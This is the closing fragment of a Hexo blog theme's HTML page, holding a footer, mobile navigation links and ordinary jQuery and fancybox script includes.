</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2021 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>